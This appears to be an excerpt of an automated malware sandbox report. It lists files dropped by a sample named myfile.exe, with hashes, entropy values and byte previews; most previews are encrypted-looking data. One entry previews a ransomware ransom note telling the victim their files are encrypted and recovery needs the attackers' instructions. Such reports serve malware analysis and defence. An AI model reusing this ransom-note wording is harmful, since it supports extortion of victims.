                                                              SHA-256:29CCB3D2E574D7926567CD919E06AAD605EC696960CE88EBDB4EB5C1999DF209
                                                              SHA-512:B3D22F90853059DC3151AA82444710E82E4277027C55FC34769FE7166332D96911A65A43BB0D18DED4D739F87BBB971A1F3A5958D0444A72BCBD3F0A808E4225
                                                              Malicious:false
                                                              Preview:.Y.Ep....*......3.Y,-Qn..y..'X;..D&.;.$..SNp......s_..O1...-@..~mp.[9.O?.(h....i.d...j....UZJ..SB.^...}.-.(....=..^...+s.b.....00x..a....N.."..5.B....[.el..S...u$..0GE[He..4.t.4.[St.7..>.&....xz...J.!}V....................e^s.D..[..V....O..QA$.T.}.8!.C...p..R.s..'-....v^..z.".y?...:v...Rg..@...!.[.S.;...#......yXch7....,..K........p...tgD..2~`.?xq..W..:.1>e%.\.... ..\..L..+4.lG3i...j..dLhq.wXn. H.....D....KI...:d..._m.5..$K.7...-.0|BRN%.x\)mrH..K...."....y........$."...;.O.....S4.=.?......3.. ..S%..xy0?.....>......:...c.g..._<g...O.b....V.O...^..b.Q....*..L.%T...-..t...`qn.....h+....+N#..9......`.....t.27..."..n..\....-U/3^POk~....>:..:|,..... .JV.k.......J.R.s~....1.78`..z..p .... ....R..n....m...')....C..w...Q...#...|%>d.dJ..._erOo..h...X.v..X-.J../......T..>E..V....X0..c. .Kb...D?{...Kp...Ld..C....h......x....y.bx..=..W@p.R..B...u._2.&E....&..u8.w.%q.........+.x......4Ep.R.SB...p?7..M.\...y.l..v.`...K.wV................b..1o..*8....{.?
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.84292114608549
                                                              Encrypted:false
                                                              SSDEEP:24:3rWIsRD9PA5nCLIvh1Y3ADA813LaFTnpykLGiczU+Xz4nrMMj/0:3rWIsLP+yIvhBj13uWVXKMo/0
                                                              MD5:B412130F0238BA647E4CA4F60B735E75
                                                              SHA1:B659E1056398329352FC64F3151E85E4BBAF42A7
                                                              SHA-256:1CF4F5AD981791068600F59607DA7C5C91B5470F0E43692D4CF0F568A39E8727
                                                              SHA-512:6D9E42AE73C5073D131ED36FAA2A4EB73060263FC0409EC34A66082DA20618910B7041230636FF65E4A0F079DB8ADB5CE200B09AE6DD00F8E156D3FC155F94D4
                                                              Malicious:false
                                                              Preview:.s....U..3...\Y..4?"^..{......R.&m.....OZ.........D..=.4.......sPlZ..F.....4.j0~c.g.g...^.d?W....g3S..x.n.C.x..h!{........6...V.V~l.....>.4S......3..F&.w..X.,..v...2....qAa.3@.. +.$..l...ZocV....iv....fQ..n%"{..s...y..p3.s...=.&......a.3..C....PNH_.B.............fam7;..H6T.2.D.?p....s%.*]$.. ..,8......u.......:...^\...G:.9..v5%..TM...k.~...?h.fK..........n...?.M ..G.w...K.X..|.|..|Wu_..n../.D.Qy.^..4..M..!...Uv..`....B+.(..\D.]....O\.y...K.N.x..Q.r...[....W....P..Civ.<..O.x......II...v~......s..&...J..`..X.%V.o.T^....i.p.............P..?>H.3..=.."..?.:..R.~.....<.. .`.......=.>....o.A.FM....I.5...w%`....B.........z~.3.@.$.lu+.6......._.<.....O..}....'.T....).....i..R*.......6~~pC..Z..#....L...t....X][....`p..._........Sf.......F.....Q........O#SY...P..9i...C1.P...9.q....Cd.....=.....B.q...-s..@..".:T}.....3.m.B)x.....S,Qq...X...N.G..+A.K.. .....fK.^L...xmbq.<5...o.v.S...Z.jA..3.x..Bg..]I+Dzq.....@.p.a..G..........PX...+M.....3.V"R\c.S..v
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.855017549274199
                                                              Encrypted:false
                                                              SSDEEP:24:tUzGwil1OAuQZspZsIkyCvwYv2rIo3gRxcMsFz3Y4Lp+g2KUR/3j1bqnrMMjI:+zdi7hZ4ZirmrVfFLYcphzURLmMoI
                                                              MD5:8FA0EAB46CD56487F90EA59C50621BC3
                                                              SHA1:64A6E892150C721992B1AD4C5F44A758BD8F48DE
                                                              SHA-256:DD61D54B344D13E6E3F84C67C949E0459623B8152325ABF002C317AFBF3DC50E
                                                              SHA-512:B844CA32C42C34C7A7CC290F8D1A4021136453E071DBC21968A0BC0BF12F9539E23AFFAB814D7A457DABDED15D18A5BEB0A0AE80B4324A1BB671B3FC0A145D2A
                                                              Malicious:false
                                                              Preview:.*.z..3.o..0L\.....uD..7h.....s..c].J..n...P..h.L...k.>..eP....@.L.i.=...d.v....a...Z..T......v.k........w.$i..............-.2.!..s.W..!....:^b.e...l..)1.&....k7.L...{/.[Fu..y...p.7......L.K|(].bn...S.... .c)[./u.v...#V....Nq..."N.8,..[.|.v.......C.R]4...5..l.-.2..UI...=R...l.cX[Z..&.6.8o9....c..%n...HL.'=...6..r_...{....@.1._..{...J..c$3 .>@o|.....}.`4.M.k-=O.....<5......&.......p...,..4..D.S:HO{.....@..h.#6`,.~.:.HJ..... :.....T.Mc..,.-..7r..]..M........i=.2z#...cU.$.......?.Y...B..O#.....zf:.....V.^...NJK.......!..'.TI...B.O.L...SM.f.Pv.>......G2>.......p..a...V.P.T@V...}{[P0.#.[u.X5\z..S.e..OIag..p\p.!.;w.iR...>.vfx.....s..f......^'.Z..CG...@.|C.....]|...M.....?.$....<s-s.pt....F.u4...A5....j\DK@......ZG.0Y-Ip6.#.~.b<b.....U.),4.!$.l9G.....`.i+..|;.. ..V%.&..~...........iT..7..;.\H.[+rD.8...2...g\.....w..&...y.H...3?&H.~.=O.M......"f..;.<5...U.,.h.[.U..-.d...m......g.....{s.C...3.Q..O.~`.+'`aU....!I.{..I....Z.e...|e...k....ED.%\.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.876718015372827
                                                              Encrypted:false
                                                              SSDEEP:24:aZMPjoa751LZMa6D8qTJPqg02L+rbxIcyxy+eRNdnrMMj5X:+MEi51Lut8q1Sg0TrbxIVxy+ELMo5X
                                                              MD5:C15AEF366177921C378D9B50D15FEB6D
                                                              SHA1:D86F7B8899D363B379CA08DF712BD7FC1D6CC3C9
                                                              SHA-256:B4C1B3450A628E8B19E8AD0B828BB99068DCDE82AB5EA4233760C01E1FB6705D
                                                              SHA-512:A864764B622D38A26970B23D596AFC4279ADE673087B815CD4EA82E54A767418D9192EC83C9CC1A6A3C905C0EDDFE57806BB1BA17909FAF0E7242B563AC67CC7
                                                              Malicious:false
                                                              Preview:.*..$..d..<r.....^.2fZb1F.O.G.Q7..=Qv.....0....6......&..8"....m...:..."......xVHL..<.gpm....P....bc.....u........?".m}^=.a.>....~..,WX...*@.T...fG&.......4i.W.....<....N.....I\..@..9...{h.VZ..0,(..17I.b1..]....@. ...&...e.....8.E.5..<...(./.4..c..9....z%...Qw........".......c....wL.+.&.8..I...0......@...A..%.4....u...}e..k..U\|5...-..7.Cg..6......Js..)[..I.`%.ZR........7.i..b,$..P.....4...j...8.+.....v..:x...I.._u..G-..Z..<!....5.....pL|W.\:..""?!fSi.4..........B.#......['...:...q.....{. .l....9.r.&r......W.5...e^C.1.=i.SO.0...T,s.+[.F.tsGJ/........n\G..?..jL.t..........Y....9...q..Q..m;_m|...x.,x...\.....&...V.+._..i..........rm.2.~..ZD`..A.8|..........U>..,....(.-.X.....).Nn.gv.$.../j..7E.=t9..[K.;.}..uWp..`.....r$w@....j.}~....^+..../.YI.Ue|rR}.a.7......5.L....:.U...1...3vszF.3>t.t"0.C.Y$....... .(..cy...Z2.&..)....B.lM.[+.q.^.Q-v4}.Y.4..J..d3_.,.]....~w...)Y/iki&..o..pc.Q..M.{.T.D..p?S.+.I.i._.u....}1.w".....a...v.F.T9...[.}...."..U2a.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.841789053438255
                                                              Encrypted:false
                                                              SSDEEP:24:UJLaTYI6r4a5z2HMmCmVWPWJEmK1x8HfzIk4+xlhnrMMjUovQ:UJOX6j5z2FzVWOo1xmbXMou
                                                              MD5:F6B647382DC0DD7428123A4CBC82296E
                                                              SHA1:138ED693ED902935A4B7AB86956D8509C2A004E6
                                                              SHA-256:2F4875811C74E87D25AEF3DDC1990ECBB653A1143487662A6F8A85BEA26DDBDD
                                                              SHA-512:4C29C9D19B16396542953637B26C7EFFBD8C2B1CF58173146DA60B29DDA007F8AB108FD328582833A2AB17B579BE09FC08770FDE483D7D25BBAD0F2FFA578C10
                                                              Malicious:false
                                                              Preview:....A.l.a;.;.k..,.].....j....\....i...@....T.k.R......R.o.....\..M...m.%g2...v..:.#.. 2..B.t8..B.#c.l5%..... !z.j....u..~.l.^..$.B...3|.8K..>0......%. ..V-$F.....;H..\.d..E...{.....a.Q>.E......&f#.U.......E0..?....o.....GYv....:M.....Y.a".h....-e...d......J....<....ND.-..?w........q.t..il.T.....7p.lG.a..5.<q}..L.W.2.....%..o....$..9...31.}V.T.U.G.$.....L...ZM..s.e..21Q.;..$..& +.T.^.u..)...aJ(}{...Tz.[.&.j[]w4.'p.Si...'../&.O.`...#.l....S..a...wM.)..V...'...\4`32..V....>.*.o....n..{.(.N.h....I.+..0uX...:A.=ktSQv...E..y.6.?..l.C0..B...j......-.....[.ix.T..%Fg.CXu..xaM.......:...:.J.ar...W.......K....>R....a..5.h:... .....QX..0.o.qb..l.l.+...1~I[.....*.T)..s.!.?(.6!.I.z...6HAY.....u..k...W..x...f...?#.O...........u.Gu..\....a.t..AO....9.e..]4....IAi.x......V.o.#z.....9w......VS....we...Qb...@.<.i.:..?......K..q(.!..:...q....}<..+.29...U.$".~....NC.;r.*..5.>+&.81..Y..?1.:(...3.je...........y....2QZR...g......=.A.2....M..A..7.........m..Y9.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:OpenPGP Secret Key
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8399689118813285
                                                              Encrypted:false
                                                              SSDEEP:24:YTVDRj0XhlOHo+qVPenJnmDgMKJFXUVtARnsPMvnfSdHbTenrMMjIfO:YTZ90RSjqdeJn8gMKJFlYC8b0MoIfO
                                                              MD5:496451F89BECB4CEEA606694E111C0A5
                                                              SHA1:A4C5FA4F9C6A6186A68A2CBC65561C51845AF221
                                                              SHA-256:1F78A502C0127052E5036285C2F3CC41726474CAC03FF0885DFA493E902607BA
                                                              SHA-512:5E2725FD63A06659DBC0EE8816D7BDB08B627D66D87530B9CDC45A9C66A3F5BC2EAD957515387AB6AE4D38C3FA993265EB50A30991AA7E4C114AA4F892DE49C3
                                                              Malicious:false
                                                              Preview:.mS.pH..w..ch3.z....}.l.@..Xj#.P....8........5...&;U.~&.{..hx<.g"S...U...&...$!bg.A.d...?V.}..b..\].......~...u5.h..<.ME.,`...H\.;..E.w>.L[...6M..E..W..z....R..g.J.......s..wM......H..}. .-z..eJ.ucv..../..R..Dv..h'..x..w.[|.~.f..b6.[..~.#...w..h1....X.."yw...*&....`..|..n ...x..z.....N.. J..&3bV...O..IME.....J....k2P.p]M#*K9Xw".6..\..H....q.....f..$jTv|Ph.y.6.n........i5.h$.G..=P..,..~.8.....B..[..S.'.../...[6y.8......I.9J.c..m.V..L...F...FX....RD"cg..?......0W.L&=c.........@0.9M...."/...\}3..V.@....h:..jZ..m..VxgnHG)....0...`..G#.jl.".h...m-G..."._.....l{...L.i...&.^..\U?.l.....l4.B.L;...P+..#..rY...r.m...+..c-..3v..`.:..QiD..8..;K..i....c...$....g.8...zh.%.:...n(0....I.....%`.J.q.(+..5Kg..P.,.4.S.4.MD...U.+i7[....k..~\.....H.~.ou.qRU<....0.w..&q..0%...^E..C.....6..A8~......8...&.yB......HN^..;~.;x.....E*............W.9wHj..T\.Z...+E.E.W1..K...J......./C.k<......j./.?....7...}....>*..F.C......,.x..]x7ogoW?k..&.4...].]Cxm.w.XnR..5....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.835123262419802
                                                              Encrypted:false
                                                              SSDEEP:24:mJT6cj9jrED1ZOJSygf4/847zigF2uwVPKmsHGfrQv/KnrMMjGWNNJP:mThj4aJ1gf4LSgFrwV1sm0HMMoGC
                                                              MD5:91C65AC8FFF4746D073E59B22E3C00BB
                                                              SHA1:2A73E576995B6701C49390116D112E4E4EAD4ED5
                                                              SHA-256:13C4BE7DF0446CCAAFBD00DBB54DA68F075E088EABFDFB7691D52B483AA30308
                                                              SHA-512:90EED3FC244EF0DE8A1A064FFDB81FC4FEF6477040356B5E7D872EAB560F3A8E00C5A0C9AA619B79ADB6560B58E21FA1CDE9A6749AF42D29C4D7308146CDC60C
                                                              Malicious:false
                                                              Preview:<n7n..d......Za#..(..W,...I.s.%.ay.....+1[-;..._...BD.aP#+.$...U....b..=.@..c.2.jP......U'{`\.3.$p.?....;.......=.o*...q.'.....UG.\..nk.{..B.-fC.......B...L^..;._X@.f...R....*2...Q.V+w"UR...M.Q*...V(L.....&(>k.Q....#q.^#..........)e.%.......'...`2..+..g.7J9%...Px..d.H.8..c. G/q......H...5..B......^;h...i..3..y......}]q{:vH.n._.`..db.u.RS...s]...u.Tj...?o......P.d.n.....i.I0......D...;.o..X.]....II.?.[.g.V@.=3.."....Y...HI.Tq3..F........E..na3.....\.K...e.\=..%j.2RL..WX......~.@........%|.>..p.4W.6.R9....F..it..O..2o..j.....j...n..<.../D.)...2....j.Jv.C...<T>.a.O..$.xa&X.L>t...uu...u...{.5@<..\..g.d+.2..K.|+.)R.Q...Jw....>.)z"v.p;-pd.....U...C...\..)...=..[R.k...n.f.8$#.QM..,....AQuL!F..U.../f..|.&w...+>p...X.1....?Q*.....?..\.2.p.b......dj...|.`.o....r..A..R.]....w........n2....3...=.ox.W&e..'Q......V..q&.3.v..*.V....X...Vwh....6e...2.i...\.1N.....U.<e.;.>H....l.G;S....=...MkH0....&]!..(.+".......uH...KqF:e.8.. .....4p.U......Z
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.867145130067857
                                                              Encrypted:false
                                                              SSDEEP:24:HgIlTN+tMLne2Ev/Xodt54GEMyc9rYSL5NXqaGkKnrMMjPo:HvRYyEv/Yuhc+SL/aZMoA
                                                              MD5:8267C7990F95058C2D9DDEA7694B9B7E
                                                              SHA1:E63908FE63443B5A2B66D38164CDE0A2C4F46DE2
                                                              SHA-256:1EDECC7746DACB944B529F86738F98A97C57A9528E7D315FB084E31E6A328318
                                                              SHA-512:E3CE081B92EA1AE5B29466E86F00BF1CCAAD3C3D37EC687F8BD02A921631A9F36045F4B947D175EA34FFD5ADCECD5D3E45B309BD92F343A0607A0B6DF3E67D44
                                                              Malicious:false
                                                              Preview:...m.E.`y.g..^v>v.f...O..\.6._%.J..ib.A'D+..N..Ns....Cj2:..fi..7.*O}@.d....n7B7g .S..20..s.h...G.....XF..ZM|.yM2.4n..l.........:[...K-/..2..jn..X!.A........!.e9j.<.y........o.fL&...r..-i....9$..FH...M".......w.q..$1.I...h..op`}......2.[. .f....u..n.+.<w.E.o..\.%....O...F.L...........Mz....+....s.2R.t.Pm...X..C';i...G.@$...k.'..C..E=.)t9... .vjCE.oZe..@$v}.uz......d...... ...}_9.Y.!.4......E...-2*]........2.B..T!.L..U.....\............1..F.m.....nM..h..]..$..X..*.5..SS.(...s7D.1n+...m.....v.....$.p.)...tR...sG. x...L.-.0....qW..s..C.u.N..{...}.Z..'..BYR...UH@.T.~.%e".%+.....-&.:..V.<..2?......2.u>t..\6.7Y..5..h.*b...D-......Eb,........17.&.t[Q.....,..Wc.m.J...dg....B)r..h|B..T@F......./.Jo...:q..a.......:..r/..n.......C....yU..t.../....mc.6.)Id}.N...hT.... U.^qx.7gg...,8..........+..(..'..8xE.s....sy.NMw......O.wz.?.......V.=.@>.p..^.&.sZ...G.W. ..w..z.:.W......B....o.N.b...K2.e1.]..<B..K.........+........ ..?...(..(*..(b..S.l=~N....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.84862957658122
                                                              Encrypted:false
                                                              SSDEEP:24:UiEXlLflT5jJ6OAryX9KwzgdYRAouaVk9Fp5mWPOTRsSofnrMMjAq:UiEplT5jJ9lM/XofVkVunojMoAq
                                                              MD5:8FC12EBB0686C8C80D42F1DD3FF68130
                                                              SHA1:6946F8C9A83C53B7825AAF4B81B99FBE863B14AF
                                                              SHA-256:EEA798D6C512ADFE85FA69F4F44E8CA5073332CE6D462516D40B1E62B98D1279
                                                              SHA-512:B6F6F08BCF70ABAF33B92228B83221045A01D858EA6775422439CBC5053EBB0ECFCF14E744F33398F49C36E0600D6675AC8AE299D47D5FAEF4B2F35B8B21D6F1
                                                              Malicious:false
                                                              Preview:.../..7^Jg....Z.....%.(ri`...b|..f.G..X0./D.../.d.,..;.k...L.F...B}...\.O(.T..F0..9.w............R.`D%..6.->.Q`....c..1..V7..Ki0..?..*S.........1..4..~WS;....RlH%....v('O..&H....r.I.."..JZ.W....v.Al!..7.l.o+.1.i.A......d.Z.*..Q..2..Y.].(...m..+...{..........Kg...d.FpM.*...A..W.>..{q.%..[3.Jo....,;..#.:_...|.z1i:1.tU.u......m@.].....C...FR.aq.....z0.....0|.W}..H.:...w..3.+....c.[f..?~.0.......9%........_-....Z.....'. Tcf{...g.".....x(z.f....f'$uc..x`.|.J..XaT.......|..>.w..m.bj..$.k.D...0.=...`...!R.@.v3e.1....2.m.sbUl..|."u.-S..#0n....F.l%..0K!....9.c.v....,1O.e....k.h.......VV..C$..]:........D.a/.^...t..eE.6x.<.F.....b..@?.L.X..q-x..]...$............p...<..n...\=.<(KBB......S.+........O.3....L.C..m.^^T........@...,.@....F.....9..?.~[..R.......^j).Q.^........9...k....4....1....M...<2.5...|...QJ.a.\-........[A....ds4....`.h.... ....s.%o%3.>{.d7..[.%4.......&..U.....+......._c...@.O&3...d.5v.+.<.p3....x.-.../Lp.......r/.......15Up;Y........a
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.874152509571739
                                                              Encrypted:false
                                                              SSDEEP:24:ByvtuIwYzVonmXbmHo8nuc3ScpqBPiKimvdH8nrMMjkDyG:ByAReVhXuBT3ufimvUMofG
                                                              MD5:940E0AA076E7600265FF611C777974BE
                                                              SHA1:27D219F9942719FE2246660AA18EA71661638C4E
                                                              SHA-256:EB2568F7210AC52C5D45FFE7F743D34FDAD48402879BF97E283215EF07FDB6A9
                                                              SHA-512:540A049AA38686E0F2323444E61D4B82D8C13FC9F7EBF9AB43EE71A0CF9731CF0FC00C30748C5742DB77382F56DC32B22250FD7FA135515E5E919FA8F4DFF492
                                                              Malicious:false
                                                              Preview:......:..n..bF..Az....o/>.k..<.A......K>.rV...MU..p...e.o.Z!1.3?.R.Lp8...FCz..x.xh....6...We.o..R......0.l(.....o..@.^.1.......D....S..r.!0.e#"L.aGK....#.3.=..."..K..3f[6u[..Tz...\.j.u...g(.$y.g(.p.\.DP"Sh.fk..*RD~..=.a..W.>..>XFI....=H.~%.bn.!..Q.,....n....<...U..{..E......w..X.Z..r.+.A:*.........`.....P..<dd.t....M.....<zF.A.&;r..N......5i........X.8..0.^..1?.Z.....).Xy.^........%..e............$..#e..[....Yv....:...A9!.i7..j.fP.a.?...W%.Z.1(C...D..<R......p<T..u.a...B.D...-.v...Bt.r....;.i>C....b>...|..*8.A.k...km..w.`.. ..&.R..X7.]./.A:._.......[.|.\.....b....t....v.j.&.y..fb.*...'R....mH.v..^."..f....T........2Q.s...^S:^....<...1...S....t:$....7.U.x...Qj....g.....t.......U(..@...`...5-4x].eE..O.M..."y..ml.oa..?r...6_!.Q.......<..|.v.w.....W...+rL~....;0~@q.........L.Z..a...{.~.W.w^..3.1g..I...7....O..{.J.D..c....u.82K..S.....F....r...v.A.o.x...3}Q.2..t.g..l.*......3....]...`=....@..-T..j.t}..8[+>......"....K.pRE.I.9Y.VV.N<5.2.)....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.833284392791749
                                                              Encrypted:false
                                                              SSDEEP:24:IhNhXw1LawShaTnj7U3Vd8McOkPDlRmynrMMjOy1:IbhXwpawShaTn6dRSK0Mor1
                                                              MD5:F0AB7E55458B37D2067174DA0BB60088
                                                              SHA1:A371BFA3CCC98ECD81B380C5B1C7FC6A7354876E
                                                              SHA-256:4A5E4F0FC77A04EEB59439D4B8FA90A9E1CE94BFB9A696F48A1FB5C2EC645C78
                                                              SHA-512:ECFA00968B019EEE480DC6DD7F09B7A80016426D8BD094144E5CC50D666B8A65347A386F4B4BA8CD5979E2E77B1BC040D0AE0E6127B0EF90D0D46A39B7955016
                                                              Malicious:false
                                                              Preview:..E.Q.M.R...........o.J\..d.....V.aK..[$}.G.h..........<b.=9.~5:...P.[.d.7{P6...5..\...ph.u=._(..R....x...d......e.`....ir..!.b]L8q.:.&e..8...vH..+.../<..>]..`2.?..........I.a.3..)n.a...4S.Es.Iw..4\a|.1-[M,..,F......[xi.#.....T-...<o.!.`.G.+..R.7..>.%.8.S.{....`....<]C......&.S.s.f.....GD-q..`..........o....<..k\w.<.7..M.D\n..W$k).R......-.......{..4%....nb<UI..'.Z."Z......w....-...n.........-V.oQ`/..kT.`l...Am2B..5..|].9&).u\....M.h..Q)."..Q.1.O7....Lp.@...yq5.9.6.oRC.sHW....I..7..1.FC...<c..a.=..8..3`,..G..E..d]....)........|+..0.O.+W.*........./nuTo...nk.9j.\PwT...q...[...J3.vZ.x..1.....B..`....`Lp.P.oX.M.|.b..Yz.....e>...a.u.P7'R..f.:..P.];-..<.....Cq)..<..n.m!T3A.U|....7*rt.wS...Xi...[.D].y...K............`.~.o.|7Tn4.;...\N..n.x8...CO(.....F...`.F.....e...l..."m9\.3.YzX..._.+|@....e....n....W7.).~.iFI...l3K..M..u.......Z.?.|.A...%....<D@.,.j.....g.6>t.e (.J.w.9.bd.TfwH..|.....R!.....(.6...N....ML..~...$P..wc..s."i.vO..e.F......X.../3
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:PDP-11 overlaid separate executable not stripped
                                                              Category:dropped
                                                              Size (bytes):339
                                                              Entropy (8bit):7.383633500177122
                                                              Encrypted:false
                                                              SSDEEP:6:McmYWgv+f49O9fMJELW55t6IXL1foH4tMj+fU+m0OcZukwEM1qn:BWgmQs9fniloH4tMj+8+18kPM1q
                                                              MD5:B3C5FE7A422181EF973AF14874568EA8
                                                              SHA1:90718E5499A31F56E6386A9BFA9FB8BD8B548546
                                                              SHA-256:E686E41AC0555E6E5DAFF3389EC4B1B0DEE7D4F9612E12259659C32B34958048
                                                              SHA-512:14ECCFC76956BAD017F14E03A0D94388492D1E3091ADC7AA8EC4C2F407728E86429DCDE8496DC4F0AEED95028A6B59812C252AA93850BBBCAC5628B141B925E2
                                                              Malicious:false
                                                              Preview:...,.Wu$`9..#...:r..\..b...vwMM+.T..v....?........%.......fM..ZT...Buh....g.......*c9u...i{.T...J......uUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..^........*..V...5J..0...../.|b(.............Q..}
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:OpenPGP Public Key
                                                              Category:dropped
                                                              Size (bytes):436
                                                              Entropy (8bit):7.52794801787491
                                                              Encrypted:false
                                                              SSDEEP:12:ugA0z2Tt7l91ExmniloH4tMj+8qju8M9y:uglyExmnrMMjUzKy
                                                              MD5:9AC112AA3FA7A94E081B280B00183BB3
                                                              SHA1:2069EF0B5781F24A0DF6284A3D0C83E2F2EC81AD
                                                              SHA-256:A3FB7A13B00ED058524D75290915E7FF7D23658B3183E07C4BD8925B3A7E54C2
                                                              SHA-512:47B5FD58AE65BC09E8C06FBEA082C2CC21FE828BC56FE8212EE669007178F1A403D49C7CCDBD6C0C00431C9609F3C860DD7D4B78A2A55747B240E9BD3C8A30B7
                                                              Malicious:false
                                                              Preview:..y...$..D.k.`.....tG......4.a...2`. M.WsB|..?.8..Sg...L.a....'.`..Z..4.~[........x.8..KU.>4x...o.......W47.y.i.7.....GB..'........m..............G1oq..|.O...X..N.6#)..=zQ.d{2cn...H.<.H...-...Y9.Y.7Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..s.....)F_M.8V.....~V.i((.|..zJ.i..9r$........LO}.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):341
                                                              Entropy (8bit):7.370147559533046
                                                              Encrypted:false
                                                              SSDEEP:6:utw2hUBDGIAua17PZ0j55A1p7qMJELW55t6IXL1foH4tMj+fUS0YM2HaJUn:+SKTHLU55XniloH4tMj+8196
                                                              MD5:F05AE425951C848217E52016BC9087E0
                                                              SHA1:BA7576753DC5B94045F910D408CF9670C65AC4D4
                                                              SHA-256:8C1977557B1C79E3B2032C11CA3003A104D9451FE36A3E86E731286D27BB80BB
                                                              SHA-512:BE6356B3CB9E2EF67590E0EC39156D9F4B4CA4B16382EB8A4F2C27AE07127710A43054E28AE84AA27799B332FE16868BFDC288BD6133D1CD07C9D19F1D076765
                                                              Malicious:false
                                                              Preview:.....?..&F@,2o..#P..^...2..'..p%,Ef>.6...".....;.+....v.l....~.!.......{.6.V..|.x/.}..;..%.=\..W..\yD......N..Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X...Z,..j...Nv..B...N.O"p9.....0.i.i...|ZX.f.....hu.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):339
                                                              Entropy (8bit):7.353648848152397
                                                              Encrypted:false
                                                              SSDEEP:6:JKktExCXHixQahiAyp9HLGXKMJELW55t6IXL1foH4tMj+fUHyPUMxEI:JoC3iqZAE9GKniloH4tMj+8HmUI
                                                              MD5:D3AFC634CCFF36CBD78EF241E7D84351
                                                              SHA1:7671745B008887073A44246A0277EAE96A8DB202
                                                              SHA-256:15067181EBBB4A0AE616F7721CD0FC0843816A04EDB42119A71D15799B9D4CF8
                                                              SHA-512:CFC41B3030A906005D14C536C82AF658113957D8CE390AE849F10F96C9B152030E7964E4A4C1104677CF5C9C8041EC017DA45F2E412CD9DBD084810C687351FA
                                                              Malicious:false
